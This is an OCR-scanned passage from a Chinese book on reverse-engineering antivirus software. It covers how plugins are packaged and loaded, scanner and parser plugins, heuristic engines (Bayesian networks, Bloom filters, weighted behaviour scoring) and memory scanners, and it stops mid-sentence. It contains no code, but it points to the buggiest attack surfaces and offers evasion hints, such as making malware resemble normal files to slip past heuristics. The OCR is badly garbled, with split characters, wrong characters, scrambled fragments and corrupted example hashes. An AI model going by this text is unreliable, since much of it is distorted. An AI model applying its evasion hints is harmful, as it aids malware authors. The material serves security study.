这 程序 。 另 一 方面 ， 以 单个 大 文件 格式 推送 更 新 , 会 让 更 新 过 程 耗 时 耗 力 。 以 多 个 若干 字 节 的 
小 型 文件 推送 更 新 ,意味 着 更 新 过 程 可 能 只 涉及 一 个 有 几 字 节 或 几 千 字 节 的 文件 而 不 是 一 个 有 
数 兆 字 节 的 文件 。 根据 提供 的 更 新 文件 的 大 小 和 数量 , 研究 者 可 以 大 概 了 解 反 病毒 软件 内 核 的 
情况 : 代码 越 多 意味 着 功能 特性 越 多 。 


3.1.3. 插件 打包 方式 的 利 浆 


在 评估 两 种 打包 插件 方式 的 利 浆 时 , 反 病 毒 工程 师 和 逆向 分 析 者 的 观点 往往 不 同 。 对 于 工程 
师 来 说 ， 使 用 动态 加 载 的 方式 是 最 容易 实现 、 也 是 问题 最 多 的 一 种 办 法 。 对 于 开发 者 来 说 ， 如 果 
反 病 毒 产品 带 有 加 密 、 压 缩 且 需要 动态 载 人 内 存 中 执行 的 搬 件 ， 则 有 以 下 缺点 。 
口 需要 占用 更 多 的 内 存 。 
a 开发 者 必须 编写 特制 的 链接 器 ， 以 便 使 这 些 由 Microsoft Visual C++ 、Clang 或 GCC 编写 的 
程序 能 够 兼容 反 病 毒 内 核 。 
口 使 用 动态 加 载 的 方式 后 ， 将 增 大 开发 者 调试 的 难度 。 在 这 种 情况 下 ， 开 发 者 不 得 不 使 用 
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hard-code INT 3 instructions 、OutputDebugString 和 printf 来 进行 调试 。 不 过 这 类 调用 
并 不 适用 于 所 有 情况 。 比 如 ，outputDebugSstring 方 法 在 Linux 和 Mac OS X 系 统 中 就 无 








法 使 用 , 男 外 ,一 些 插件 并 不 是 使 用 本 机 语言 编写 的 , 比如 那些 针 
Machine ( GVM ) 开发 的 插件 。 


对 Symantec Guest Virtual 


O 反 病 毒 开发 者 不 得 不 针对 每 一 个 操作 系统 开发 不 同 的 反 病 毒 插件 加 载 器 。 因 此 ， 尽 管 可 





以 跨 平 台 共用 代码 , 但 是 如 果 操 作 系统 增多 ( 一 般 需 要 支持 2~3 个 
X 和 Linux )， 工 作 量 就 会 翻 倍 。 





系统 : Windows, Mac OS 


Q 如 果 复 制 到 内 存 的 代码 需要 重新 分 配 地 址 ， 开 发 的 复杂 程度 和 反 病 毒 插件 的 加 载 时 间 都 


会 增加 。 





由 于 相关 文件 需要 被 加 密 和 压缩 , 开发 这 样 一 套 系统 的 复杂 度 无 疑 会 增加 。 男 外 ， 因 为 插件 
释放 过 程 中 生成 的 文件 不 是 标准 的 可 执行 文件 〈 比如 PE 文件 、MachO 文 件 或 ELF 文 件 )， 所 以 反 
病毒 软件 开发 者 不 得 不 为 反 病 毒 插 件 开发 一 种 特殊 的 签名 认证 机 制 。 但 是 , 反 病 毒 软件 通常 并 不 














会 这 么 做 。 实际 上 ,大 多 数 的 反 病 毒 软件 除了 使 用 一 种 简单 的 CRC32 算 法 检查 外 ， 并 不 进行 任何 


其 他 额外 的 签名 认证 。 











从 一 位 反 病 毒 工程 师 的 角度 来 讲 ， 对 反 病 毒 内 核 采 用 卡巴 斯 基 式 的 方法 有 以 下 优点 : 








口 消耗 的 内 存 较 少 ; 

口 开发 者 可 以 借助 任何 调试 工具 调试 编写 的 本 机 代码 。 

但 同时 ， 该 方法 也 有 以 下 缺点 : 

口 对 开发 者 来 说 ， 在 反 病 毒 内 核 中 内 置 一 个 全 功能 链接 需 是 一 项 不 




















平台 共用 )。 








小 的 工作 ; 


口 针对 反 病 毒 软件 兼容 的 平台 ， 必 须 开 发 并 持续 维护 相关 链接 器 〈 尽管 大 部 分 代码 可 以 跨 


每 家 反 病 毒 软件 三 商都 要 根据 自己 的 需求 选择 最 适合 的 插件 加 载 方 式 。 遗憾 的 是 , 大 多 数 反 
病毒 三 商都 会 直接 采用 他 们 想到 的 第 一 种 办 法 ,而 不 考虑 可 能 的 后 果 、 插件 后 期 维护 甚至 是 将 插 








件 移植 到 新 的 操作 系统 平台 上 ( 比如 Linux 和 Android 或 Mac OS 久 和 iOS ) 
多 反 病 毒 产 品 即 是 如 此 ， 在 Linux 和 Mac OS X 系 统 中 使 用 相同 的 PE 文件 力 








需要 耗费 多 少 精力 。 许 
1 载 器 。 这 些 厂商 的 插件 





通常 是 仅 针对 当前 支持 的 系统 平台 ( Windows 系 统 ) 而 开发 的 非 标 准 PE 文件 ( 这 类 插件 使 用 PE 
文件 头 作为 容器 ， 但 是 相 较 于 传统 PE 文件 ， 却 使 用 的 是 完全 不 同 的 文件 格式 )。 他 们 从 未 考虑 过 
将 来 将 代码 移植 到 别 的 系统 平台 上 。 许 多 反 病毒 三 商 犯 有 同样 的 设计 错误 : 过 分 关注 对 Windows 


平台 的 兼容 。 





然而 , 从 逆向 分 析 角 度 来 说 , 这 有 很 大 的 好 处 : 我 们 的 分 析 对 象 就 是 在 机 器 上 链接 起 来 的 运 

行 反 病 毒 产 品 的 对 象 文件 。 有 许多 原因 使 反 病毒 产品 的 加 载 机 制 更 容易 被 逆向 分 析 。 
口 如 果 反 病毒 软件 带 有 链接 器 , 并 以 COFF 文 件 格 式 的 方式 分 发 所 有 的 插件 文件 , 这 些 COFF 
对 象 文件 可 以 直接 用 IDA 打 开 。 由 于 链接 器 的 需要 ,这 些 文件 自 傍 调试 符号 。 这 类 调试 符 














号 使 得 分 析 目 标 反 病 毒 插件 的 内 部 结构 变 得 相当 容易 。 























口 如 果 这 些 插件 文件 是 简单 的 支持 操作 系统 的 二 进 制 文件 ， 在 分 析 工 作 一 开始 ， 你 就 可 以 
在 IDA 中 加 载 查看 。 根 据 系统 的 差异 ， 有 时 你 可 以 获取 到 调试 符号 〈 最 典型 的 有 Linux、 
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*BSD 和 Mac OS X 系 列 )。 
如 果 反 病毒 软件 动态 加 载 了 非 系统 标准 模块 ， 你 需要 解密 插件 ,将 它们 解密 成 可 以 被 IDA 或 
其 他 逆向 分 析 软 件 加 载 的 格式 。 另 外 ， 由 于 代码 被 载 人 堆 中 ， 而 ASRL 保 护 技术 使 这 些 模块 经 常 
会 被 载 人 不 同 的 内 存 地 址 ， 除 非 IDA 数 据 库 被 正确 重 定位 ， 和 否则 每 次 启动 调试 器 ， 代 码 就 会 被 定 
位 到 一 个 完全 不 同 的 位 置 ， 所 有 注释 、 函 数 名 和 之 前 反 汇 编 过 程 中 所 做 的 标注 都 将 丢失 ,整个 过 
程 真 的 非常 繁琐 无 味 。IDA 在 调试 时 并 不 能 正确 重 定 位 代码 。 设 置 断 点 的 时 候 也 如 此 一 一 如 果 你 








个 无 效 的 内 存 地 址 处 。 


提示 “你 可 能 认为 采用 动态 加 载 的 方式 可 以 更 好 地 保护 反 病 毒 软件 产品 的 知识 产权 。 但 是 ， 在 
分 析 工 作 之 初 设置 一 些 难 度 并 不 能 起 到 任何 保护 的 作用 。 使 用 动态 加 载 技术 只 会 使 得 产 
品 分 析 更 具 挑 战 性 ， 让 前 面 几 步 分 析 过 程 略 具 难 度 罢 了 。 


3.2 ” 反 病 毒 插件 的 种 类 


反 病 毒 插件 有 许多 种 : 一 些 仪 仪 是 让 反 病 毒 产 品 能 够 支持 更 多 的 压缩 文件 种 类 , 还 有 一 些 用 
于 执行 深度 扫描 和 查 杀 修复 感染 型 病毒 ( 比如 Sality 病 毒 或 Virut 病 毒 ) 一些 插件 可 能 是 反 病毒 工 
程 师 的 好 帮手 C 因为 这 些 搬 件 可 以 帮助 通用 病毒 查 杀 和 感染 修复 ， 比 如 反 汇 编 引 苟 、 模 拟 需 甚至 
是 新 的 特征 码 种 类 )， 也 可 能 属于 一 些 全 新 、 完 全 不 同 的 插件 种 类 ， 比 如 针对 特定 的 反 病 毒 虚拟 
机 开发 的 反 病 毒 插件 ( 就 像 为 了 提取 许可 文件 而 解 开 受 VMProtect 保 护 的 第 一 层 程 序 ) 或 为 了 文 
持 某 些 脚 本 语言 而 开发 的 插件 。 对 所 有 反 病 毒 软件 分 析 者 来 说 , 想 要 了 解 一 款 反 病毒 软件 的 工作 
原理 ， 就 必须 理解 反 病毒 插件 的 加 载 系统 及 其 支持 的 插件 类 型 。 这 是 因为 反 病毒 内 核 最 有 趣 的 地 
方 不 是 内 核 本 身 ， 而 是 内 核 加 载 的 模块 。 

接 下 来 将 详细 介绍 一 些 反 病毒 软件 通常 会 溃 有 的 插件 功能 . 


3.2.1 扫描 器 和 通用 侦 测 程序 


扫描 器 是 任何 一 款 反 病毒 软件 中 最 常见 的 插件 类 型 。 它 是 一 款 对 某 些 文件 格式 、 目 录 、 用 户 
和 内 核 内 存 等 开展 特定 种 类 扫描 的 插件 。ADS (alternate data stream， 文 件数 据 流 ) 扫描 器 是 这 
类 插件 的 典型 案例 。 反 病毒 软件 的 核心 内 核 通常 仅 能 够 使 用 操作 系统 提供 的 方法 (createFile 
或 open syscall) 来 分 析 文 件 和 目录 ( 有 时 ， 还 会 分 析 用 户 态 内 存 )。 但 是 在 类 似 Mac OS XK 
用 的 HFS+ 和 Windows 采 用 的 NTFS 的 一 些 文件 系统 中 ， 文 件 可 以 隐藏 在 交换 数据 流 中 ， 所 以 内 核 
程序 无 法 检测 这 类 文件 。 这 类 扫描 器 是 拓展 反 病毒 内 核 功 能 的 插件 , 用 于 对 在 ADS 中 发 现 的 所 有 
文件 进行 枚 举 、 迭 代 并 加 载 其 他 扫描 程序 进行 检测 。 

还 有 一 些 扫描 器 支持 内 存 扫描 , 但 反 病 毒 产 品 并 不 直接 支持 本 项 功能 , 或 通过 内 核 驱 动 直接 
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接触 内 核 内 存 ( 正如 Microsoft Antivirus 做 的 那样 )。 另 外 一 些 种 类 的 扫描 器 只 能 在 一 个 插件 被 启 
动 以 后 才能 被 加 载 。 比 如 ， 当 扫描 器 扫描 文件 的 时 候 ， 如 果 在 文件 内 部 发 现 了 一 个 URL 链 接 , 那 
么 这 时 候 URL 扫 描 搬 件 就 会 被 加 载 。URIL 扫 描 器 会 检测 文件 包含 的 是 否 为 恶意 链接 。 

当 你 通过 逆向 工程 技术 查找 反 病 毒 软 件 内 的 安全 缺陷 或 绕 过 反 病 毒 软件 的 方法 时 , 应 该 着 重 
注意 以 下 信息 : 
口 一 个 文件 如 何以 及 何 时 被 标记 为 恶意 软件 ; 
口 文件 解析 器 、 解 压缩 模块 和 EXE 脱 壳 程 序 是 如 何 被 加 载 的 ; 
口 什么 时 候 调用 通用 检测 程序 扫描 样本 文件 ; 
O 如 果 反 病毒 产品 带 有 沙 盒 功能 的 话 ， 样 本 什么 时 候 会 被 放 入 其 中 执行 。 

分 析 扫 描 器 的 时 候 , 可 以 确定 使 用 了 哪些 类 型 的 特征 码 , 以 及 这 些 特 征 码 是 如 何 用 于 文件 或 
缓冲 区 扫描 的 。 

另外 还 有 一 些 插件 类 型 可 以 归 为 通用 扫描 程序 。 这 类 扫描 插件 用 于 特殊 文件 、 目 录 、 注 册 
KEY 等 的 扫描 (也 有 可 能 是 修复 文件 感染 )。 比 如 ， 有 一 种 插件 被 开发 用 于 侦 测 Sality 文 件 感染 型 
病毒 及 其 变种 ， 为 接 下 来 的 感染 文件 修复 收集 相关 信息 。 如 果 可 以 的 话 , 将 这 些 信 息 整合 进 内 部 
结构 中 ， 这 样 其 他 插件 ( 比如 感染 文件 修复 程序 ) 就 可 以 直接 使 用 了 。 

从 逆向 工程 角度 来 说 ， 当 提 到 漏洞 的 产生 时 ,通用 扫描 程序 通常 会 表现 得 十 分 有 趣 ， 因 为 它 
们 往往 是 安全 缺陷 的 重要 来 源 。 处 理 复杂 病毒 文件 的 代码 党 稼 容易 出 错 ， 当 病毒 流行 势头 过 了 以 
后 , 由 于 开发 者 们 认为 病毒 几乎 已 经 销声匿迹 了 , 处 理 相关 病毒 的 代码 往往 会 几 年 都 没有 人 维护 
更 新 。 因 此 ， 洪 藏 在 这 类 程序 代码 中 的 缺陷 往往 鲜 有 人 问津 。 在 用 于 查 杀 29A team, MS-DOCH 
及 早期 Microsoft Windows 版 本 中 病毒 的 通用 扫描 程序 中 发 现 可 利用 的 安全 缺陷 , 并 不 是 一 件 稀奇 
的 事情 。 


尽管 通用 查 杀 程序 及 其 相应 的 感染 修复 模块 似乎 都 是 基础 功能 模块 ,但 是 一 些 反 病毒 内 核 
并 没有 提供 内 部 插件 模块 通信 的 方式 。 由 于 类 似 的 功能 短 板 , 没有 模块 间 交 互通 信 的 反 病 毒 内 
核 会 在 感染 文件 的 修复 模块 中 重复 使 用 通用 病毒 检测 模块 中 的 相关 代码 ,文件 感染 修复 模块 代 
码 中 的 bug 被 修复 后 , 可 能 不 会 同步 修复 通用 查 杀 程序 中 重用 使 用 的 相关 代码 。 也 正 因为 这 样 ， 
通用 病毒 检测 模块 中 已 经 修复 的 bug 在 文件 感染 修复 模块 的 代码 中 仍然 存在 。 当 使 用 扫描 器 修 
复 感染 文件 逻辑 的 时 候 , 相关 bug 就 会 被 触发 。 感染 文件 修复 模块 中 的 bug 是 反 病 毒 软件 中 较 少 
涉足 的 领域 之 一 。 






















































































































































































3.2.2 ”支持 文件 格式 和 协议 


一 些 插件 用 于 分 析 文 件 格 式 和 协议 。 这 类 插件 提升 了 反 病毒 内 核 解析 、 打 开 和 分 析 新 型 文件 
格式 和 协议 〈 比如 文件 壳 或 EXE 封 装 程序 ) 的 能 力 。 则 在 分 析 协 议 的 插件 通常 会 内 置 在 网 关 或 服 
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务 器 产品 中 , 在 桌面 个 人 版 产品 中 则 人 鲜 有 此 类 插件 的 身影 。 不 过 ,， 有 一 些 反 病毒 产品 的 桌面 个 人 
版 也 会 提供 分 析 基 础 网 络 协议 C 比如 HTTP 协 议 ) 的 功能 。 

这 类 插件 可 以 是 针对 UPX、Armadillo 、FSG 、PeLite 或 ASPack EXE packer 的 脱 壳 程序 ， 可 以 
是 PDF、OLE2 LNK, 、SIS 、CLASS 、DEX 或 SWF 的 文件 解析 器 , 也 可 以 是 针对 zlib gzip, RAR, 
ACE、XZ 和 7z 等 文件 的 解压 缩 程序 。 反 病毒 内 核 包 含 形形色色 的 插件 ， 这 些 插件 正 是 反 病 毒 产 
品 bug 的 最 大 来 源 。Adobe 公 司 的 Acrobat Reader 解 机 PDF 格式 文件 出 现 漏洞 的 可 能 性 有 多 大 ? 如 
果 你 仔细 去 看 CVE ( Common Vulnerabilities and Exposure， 通 用 漏洞 ) 公开 列表 的 话 ， 就 会 发 现 
正确 解析 这 类 文件 格式 的 难度 有 多 大 了 。 因 此 , 反 病 毒 广 商会 有 多 大 的 可 能 性 去 开发 一 个 毫 无 pug 
的 文件 解析 程序 ， 用 于 解析 一 份 1310 页 (除去 目录 还 有 1159 页 ) 的 文档 呢 ? 

当然 ， 上 述 可 能 性 取决 于 反 病 毒 工程 师 。PDEF 格 式 解析 引擎 已 有 提 及 ， 但 在 反 病 毒 软 件 中 ， 
支持 扫描 Microsoft Word、Excel、Visio 和 PowerPoint 文 件 的 OLE2 引 擎 ，ASEF 格 式 视频 引擎 、 支 持 
Mac OS X 操 作 系 统 平台 下 可 执行 程序 分 析 的 Mach0 引 擎 、 针 对 ELF 可 执行 文件 以 及 一 长 串 更 为 复 
杂 的 文件 格式 的 引 警 ， 这 些 引 苟 不 出 bug 的 可 能 性 又 有 多 大 呢 ?” 要 回答 这 个 问题 很 简单 ， 由 于 反 
病毒 软件 的 解析 引 苟 插件 要 解析 这 么 多 文件 格式 , 其 中 相关 模块 潜在 的 漏洞 数量 也 十 分 庞大 。 如 
果 再 考虑 一 下 反 病 毒 软件 需要 支持 的 协议 , 其 中 有 些 协议 还 是 没有 相关 文档 规范 或 者 规范 模糊 的 
( 比如 Oracle 公 司 的 TNS 协 议 或 CIFS 协 议 )， 你 就 会 刁 然 醒悟 ， 这 类 模块 对 任意 一 款 反 病 毒 软件 来 
说 都 是 最 易 受 到 攻击 的 地 方 。 




















































































































解析 和 解密 插件 的 复杂 性 

反 病 毒 软 件 经 常 需要 处 理 不 完整 的 代码 ,。 但是, 在 编写 文件 解析 器 或 解密 器 时 , 反 病 毒 工 
程 师 常常 会 把 软件 需要 处 理 的 文件 当 作 结构 正常 的 文件 来 处 理 。 这 导致 反 病 毒 软件 在 解析 文件 
和 协议 过 程 中 经 常 出 错 , 另外 , 还 有 一 些 反 病毒 工程 师 想 让 反 病 毒 软件 的 检测 范围 覆盖 到 边缘 
文件 , 这 就 大 大 增加 了 反 病 毒 插 件 的 复杂 性 ,也 给 反 病 毒 软件 带 来 不 少 潜在 的 缺陷 。 安 全 研究 
者 和 反 病 毒 工程 师 需 要 特别 关注 反 病 毒 软件 中 的 文件 解析 器 和 解密 器 插件 。 


3.23 ”启发 式 检测 


启发 式 检测 引擎 位 于 核心 反 病毒 引擎 结构 的 项 端 , 用 来 与 其 他 插件 模块 通信 或 综合 其 他 插件 
提供 的 病毒 检测 信息 。 开 源 的 反 病 毒 软件 ClamAV 就 是 使 用 启发 式 检测 引 警 的 典型 例子 之 一 。ZIP 
启发 式 引 擎 用 来 检测 加 密 过 的 ZIP 文 件 ， 在 此 过 程 中 会 使 用 到 其 他 插件 提供 的 前 期 信息 。 比 如 针 
对 ZIP 压 缩 文 件 开发 的 文件 格式 检测 插件 ， 在 前 期 会 尽 可 能 多 的 收集 与 待 检 测 文件 相关 的 信息 。 
ZIP 引 警 会 首先 通过 扫描 引擎 确认 ZIP 文 件 格式 可 以 被 反 病 毒 内 核 解析 。 启 发 式 引擎 会 根据 设置 的 
启发 式 检测 敏感 级 别 , 综合 前 期 收集 的 信息 ,最 终 判 定 文件 是 否 安 全 ， 是 否 需要 对 用 户 发 出 警告 
提示 。 

启发 式 检测 引擎 很 容易 产生 误 报 , 因为 其 实现 原理 是 基于 相关 证 据 盘 点 文件 是 否 恶意 。 比如 ， 
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一 份 PDF 文 件 看 似 畸 形 、 十 分 可 疑 ， 因 为 它 包 含 JavaScript 代 码 , 能 入 了 通过 多 种 加 密 手 段 的 数据 
流 (有 一 些 甚 至 是 重复 的 ， 比 如 针对 一 个 附件 重复 采用 了 FlasteDecode 或 ASCII85Decode )， 并 包 
含 各 类 以 ASCIT、 十 六 进 制 和 八进制 编码 的 字符 串 。 因 此 ， 在 扫描 这 类 文件 的 时 候 ， 启 发 式 引 苟 
很 有 可 能 会 认为 该 文件 是 一 个 漏洞 利用 攻击 程序 。 但 是 ， 存 在 bug 的 PDF 文件 生成 程序 也 会 生成 
此 类 畸形 文件 ， 而 Adobe Reader 会 忽略 文件 的 畸形 部 分 直接 打开 文件 。 这 也 是 反 病毒 开发 者 面临 
的 一 大 挑战 ， 尽 可 能 避免 将 正常 软件 生成 的 畸形 鉴定 为 病毒 而 进行 误 报 。 

有 两 种 启发 式 引擎 : 静态 和 动态 。 静 态 启发 式 引擎 不 需要 执行 样本 来 判定 其 是 否 是 恶意 文件 ， 
而 动态 启发 式 引 警 则 恰恰 相反 ， 需 要 在 虚拟 系统 中 执行 程序 并 监控 文件 行为 ， 比 如 开发 基于 Itel 
ARM 架 构 的 沙 盒 程 序 或 JavaScript 脚 本 程序 模拟 器 。 前 面 讨论 的 针对 PDF 和 ZIP 文 件 的 检测 可 以 归 
类 为 静态 检测 ， 在 接 下 来 的 “基于 权重 的 启发 式 引擎 ”一 节 , 我 们 将 讨论 动态 启发 式 引擎 的 相关 
技术 。 

本 节 讨 论 了 反 病 毒 软 件 中 一 些 简 单 的 启发 式 检测 引擎 的 实现 。 然 而 , 我 们 经 常 从 反 病 毒 软件 
中 发 现 一 些 更 为 复杂 的 启发 式 引擎 ， 后 面 会 对 此 进行 相关 介绍 。 

1. 贝 叶 斯 网 络 

贝 叶 斯 网 络 ( 信和 度 网 络 ) 是 反 病毒 产品 采用 的 使 用 统计 模型 代表 一 组 变量 的 方式 。 这 些 变 
量 通常 是 条 件 依赖 关系 、PE 文 件 头 以 及 其 他 一 些 启发 式 检 测 标志 ， 如 文件 是 否 加 壳 或 被 压缩 ， 
部 分 文件 炉 是 否 过 高 ， 等 等 。 贝 叶 斯 网 络 用 以 揭示 不 同 恶 意 软 件 间 的 概率 关系 。 反 病毒 工程 师 
会 使 用 恶意 文件 和 正常 文件 来 训练 基于 贝 叶 斯 网 络 的 启发 式 病毒 检测 引擎 。 一 般 来 说 ， 贝 叶 斯 
网 络 只 会 在 反 病 毒 软 件 内 部 版 本 和 一 些 零售 版 本 中 使 用 。 尽 管 使 用 贝 叶 斯 网 络 是 一 种 强 有 力 的 
启发 式 检 测 手段 , 但 其 误 报 率 非 常 高 。 反 病毒 三 商 通常 会 通过 以 下 方式 训练 基于 贝 叶 斯 网 络 的 局 
发 式 检测 引擎 : 

(1) 反 病 毒 工程 师 将 一 个 新 样本 传递 给 贝 叶 斯 网 络 ; 

(2) 检测 引擎 收集 样本 的 启发 式 检 测 标志 ， 并 将 检测 状态 保存 在 内 部 变量 

(3) 如 果 收 集 的 标志 与 已 知 恶 意 软 件 样本 族 完全 吻合 或 十 分 相似 ， 贝 叶 斯 网 络 就 会 给 出 相关 
评级 ; 

(4) 使 用 贝 叶 斯 网 络 给 出 的 相关 评级 数值 ， 反 病毒 软件 就 可 以 判断 对 应 样本 文件 “很 有 可 能 
是 恶意 软件 ”或 “很 有 可 能 是 正常 文件 ”。 

当然 在 使 用 贝 叶 斯 网 络 的 情况 下 , 我 们 也 会 遇 到 相同 的 困惑 : 如 果 恶 意 软件 和 正常 文件 具有 
相同 的 PE 文件 头 或 其 他 启发 式 检测 标志 ( 压缩 方式 、 炉 等 )， 或 者 几乎 所 有 检测 标志 都 相似 怎么 
办 ?” 反 病毒 软件 将 会 产生 漏 报 (将 恶意 软件 归 为 正常 文件 )。 如 果 正 常 文件 使 用 了 加 过 或 虚拟 机 
保护 技术 , 而 且 启 发 式 检测 标志 和 一 些 亚 意 软件 族 相 类 似 又 会 发 生 什么 呢 ? 结果 显而易见 : 产生 
误 报 。 

和 反 病 毒 引擎 实现 的 任何 一 种 启发 式 引擎 一 样 , 绕 过 基于 贝 叶 斯 网 络 十 分 容易 。 用 一 句 话 来 
总 结 就 是 : 让 编写 出 来 的 病毒 尽 可 能 与 正常 文件 类 似 。 
通常 情况 下 ， 基 于 贝 叶 斯 网 络 技术 的 反 病 毒 引 擎 有 以 下 两 种 目的 : 
口 侦 测 可 能 是 病毒 的 新 样本 ; 
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口 收集 新 型 病毒 样本 文件 。 

反 病 毒 厂 商 通 常会 询问 用 户 是 否 要 加 入 反 病 毒 社区 , 以 便 发 送 用 户 电脑 上 的 可 疑 文件 以 供 分 
Jr. 在 将 相关 可 疑 文件 发 送 给 反 病 毒 厂商 之 前 , 反 病 毒 软件 会 先 使 用 贝 叶 斯 网 络 往 选 出 一 些 潜在 
候选 恶意 文件 ( 当 可 疑 文件 数量 过 多 的 时 候 )。 

2. Bloom 过 滤器 

Bloom 过 滤器 是 反 病毒 软件 用 来 判断 文件 是 否 已 知 恶 意 软 件 的 数据 结构 。Bloom 过 滤器 会 判 
断 对 应 文件 是 完全 不 在 恶意 软件 数据 集中 还 是 很 可 能 在 数据 集中 。 如 果 其 他 插件 模块 收集 的 启发 
式 标志 通过 了 Bloom 过 滤器 ， 那 么 样本 绝对 不 是 恶意 软件 ， 反 病毒 软件 也 不 必 将 文件 或 缓冲 区 内 
容 分 发 给 其 他 更 为 复杂 ( 检测 速度 会 更 慢 ) 的 检测 模块 了 。 只 有 无 法 通过 Bloom 过 滤器 的 样本 文 
件 才 会 传递 进入 更 复杂 的 启发 式 引擎 检测 模块 。 

下 面 是 一 个 假设 的 Bloom 过 滤器 ， 通 常 被 用 来 阐释 其 原理 。Bloom 过 滤器 背后 有 一 个 存储 着 
特征 MD5 的 数据 库 。 假 如 在 数据 库 中 ， 有 包含 以 下 散 列 的 样本 : 


99754106633f94d350db34d548d6091a9fe934c7a727864763bff7eddba8bd49 
e6e5fd26daa9bca985675£67015£8882e87cdcaeed6aal2fb52ed552de99d1laa 


如 果 分 析 中 的 新 样本 文件 或 缓冲 区 内 容 不 以 9 或 E 开 头 ,我 们 可 以 认为 它 不 在 恶意 文件 特征 集 
当中 , 也 不 需要 再 发 送 给 深度 启发 式 扫描 程序 做 检测 了 。 但 是 ,如 果 以 9 或 E 开 头 , 那么 样本 文件 
可 能 属于 恶意 文件 特征 集 , 这 时 候 就 需要 进行 更 复杂 的 查询 侦 测 来 判定 对 应 样本 文件 是 否 是 恶意 
软件 。 上 面 的 例子 仅仅 从 理论 层面 前 释 了 Bloom 过 滤器 的 工作 方式 。 在 真实 工作 环境 下 ， 有 许多 
更 好 的 方式 来 判断 对 应 样本 文件 的 散 列 是 否 在 已 知 恶 意 软 件 特征 数据 库 中 。 

几乎 所 有 反 病 毒 产品 中 的 启发 式 检测 引擎 都 会 使 用 到 基于 散 列 ( 无 论 是 加 密 散 列 还 是 模糊 散 
列 ) 的 Bloom 过 滤器 。 总 的 来 说，Bloom 过 滤 需 一 般 被 用 来 判定 样本 文件 是 否 需要 进行 更 深层 次 
的 扫描 或 直接 判定 为 正常 文件 。 

3. 基于 权重 的 启发 式 引 擎 

在 许多 反 病 毒 引 擎 中 都 可 以 发 现 基于 权重 的 启发 式 引擎 。 在 插件 收集 完 关 于 样本 文件 或 待 扫 
描 绥 冲 区 的 信息 后 ,启发 式 检测 标志 会 被 计算 收集 起 来 。 接 着 ， 基 于 这 些 标 志 ， 反 病毒 引擎 将 会 
分 配对 应 权重 。 比 如 说 ,样本 文件 在 反 病毒 软件 的 沙 盒 环境 或 模拟 器 中 运行 。 在 此 过 程 中 ， 相 关 
文件 特征 行为 将 会 被 记录 。 基于 权重 的 启发 式 引 擎 将 会 对 不 同 的 文件 操作 行为 分 配 不 同 的 权重 值 
(可 正 可 负 )。 当 针对 样本 文件 执行 的 所 有 操作 分 配 完 权重 值 后 , 反 病 毒 引 擎 会 最 终 判定 对 应 文件 
是 否 是 恶意 软件 。 举 个 例子 ， 反 病毒 软件 会 将 以 下 恶意 软件 行为 记录 : 

(1) 恶意 软件 读 取 了 运行 目录 下 纯 文本 格式 文件 内 容 ; 

(2) 恶意 软件 弹出 让 用 户 进行 确定 或 取消 操作 的 对 话 框 ; 

(3) 从 未 知 域名 下 载 一 个 可 执行 文件 ; 

(4) 将 可 执行 文件 复制 至 ssSystemDirgi 

(5) 执行 下 载 的 文件 ; 

(6) 最 终 ， 样 本 文件 运行 一 个 用 以 结束 自身 进程 并 自 删 除 的 批 处 理 文件 。 

基于 权重 的 启发 式 引擎 会 对 上 述 步骤 中 的 前 两 步 分 配 负数 数值 (因为 类 似 启 动 行为 )， 但 会 
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为 接 下 来 的 操作 步骤 分 配 正 数 数值 ( 因为 这 些 操 作 是 典型 的 下 载 者 行为 )。 当 对 每 个 文件 操作 行 
为 分 配 了 权重 数值 以 后 ， 基 于 用 户 的 相关 扫描 配置 ， 对 应 样本 文件 的 最 终 权重 将 会 被 计算 出 来 ， 
从 而 判定 文件 是 否 是 恶意 软件 。 


3.3 ”高 级 插件 


除了 之 前 讨论 的 插件 模块 外 , 反 病 毒 产 品 中 还 有 许多 各 异 的 模块 。 本 部 分 将 介绍 反 病毒 产品 
中 常见 的 高 级 插件 模块 。 


3.3.1 内 存 扫描 器 


扫描 器 是 反 病毒 产品 使 用 最 多 的 插件 ,一 个 高 级 扫描 器 就 是 我 们 常 能 在 反 病毒 产品 中 发 现 的 
内 存 扫 描 器 。 内 存 扫 描 器 可 以 读 取 进 程 内 存 , 通过 特征 码 和 通用 检测 等 对 内 存 中 的 缓冲 区 进行 扫 
描 。 几 乎 所 有 反 病 毒 软件 都 会 提供 形式 各 异 的 内 存 分 析 工 具 。 

内 存 扫描 器 通常 分 为 两 种 : 用 户 态 扫描 器 和 内 核 态 扫描 器 。 前 者 通常 扫描 用 户 程序 所 在 内 存 
块 , 后 者 则 扫描 内 核 驱 动 、 进 程 等 。 两 者 的 共同 点 是 都 非常 慢 ， 并且 经 常 只 能 在 具体 事件 发 生 之 
后 进行 扫描 ， 比 如 潜在 的 恶意 程序 启动 之 后 。 当 然 , 大 多 数 时 候 , 用户 可 以 使 用 病毒 扫描 引擎 进 
行 完整 的 扫描 。 同 时 ， 用 户 态 内 存 扫 描 器 也 能 被 系统 接口 C 比如 基于 Windows 的 操作 系统 中 的 
OpenProcess 和 ReadProcessMemeory ) 或 者 第 三 方 内 核 态 扫描 器 调 用 。 

使 用 系统 接口 来 调用 用 户 态 扫描 顺 并 不 总 是 明智 之 选 , 因为 它 可 以 被 其 他 程序 干扰 ,恶意 软 
件 开 发 者 们 也 有 诸多 方法 来 绕 过 它 。 例 如 ， 有 些 恶意 软 件 已 经 预先 写 好 了 绕 过 扫描 器 的 方法 ， 比 
如 进入 休眠 状态、 删除 部 分 特征 文件 或 者 直接 阻止 扫描 。 内 建 保护 机 制 的 恶意 软件 能 直接 使 扫描 
器 发 生 错 误 进 而 导致 拒绝 服务 。 这 正 是 反 病 毒 程序 开发 者 不 喜欢 这 种 方式 ,而 是 更 喜欢 使 用 内 核 
驱动 程序 来 读 取 外 部 进程 内 存 的 原因 。 除非 恶意 软件 与 另 一 内 核 组 件 建立 连接 , 否则 我 们 无 法 得 
知 进程 的 内 存 是 否 被 读 取 。 要 读 取 内 核 内 存 ， 反 病毒 软件 公司 必须 编写 内 核 驱 动 程序 。 反 病毒 引 
擎 研发 公司 已 经 开发 出 了 能 够 同时 读 取 用 户 进程 和 内 核 进程 内 存 的 内 核 驱动 程序 , 相当 于 在 用 户 
进程 与 内 核 进程 之 间 插 入 通信 子 层 ， 以 传递 缓冲 区 内 容 至 扫描 程序 进行 分 析 。 

当然 ， 如 果 这 些 程序 组 件 不 经 过 安全 验证 也 能 造成 不 少 的 bug。 如 果 内 核 驱 动 程序 不 验证 是 
哪 一 个 应 用 在 调用 LO 控制 代码 (IO Control Code, IOCTL ) 来 请 求 内 核 内 存 的 读 取 权 限 ， 会 出 
